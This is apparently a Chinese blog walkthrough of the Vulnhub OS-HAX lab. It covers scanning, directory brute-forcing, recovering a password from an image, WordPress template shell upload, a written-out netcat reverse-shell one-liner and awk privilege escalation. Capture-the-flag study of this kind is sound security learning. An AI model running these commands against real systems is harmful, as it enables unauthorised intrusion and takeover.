前言
- Vulnhub刷题简单记录
OS-HAX
描述
难度:中级
标志:引导根
学习:利用 | 网络应用安全| 权限提升
OS-HAX开始
1、可以用两种方法确认靶场的存在,扫ip
1 |
netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 |
nmap -sV -sC -A 192.168.1.108 |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 |
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 |
4、通过String查看img中的flaghost的图片,获取一个密码的信息passw@45
5、也可以用exiftool 来查看图片信息
6、接着猜测他是目录,发现了brainfuck加密,接着去解密http://192.168.1.102/passw@45/flag2.txt
1 |
i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<] |
7、利用获取的账号和密码登陆wordpress后台改模板拿shell
7、用下面命令反弹shell
1 |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.104 1234 >/tmp/f |
8、提权看下面截图,就是利用web的权限,执行awk命令来获取root权限
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论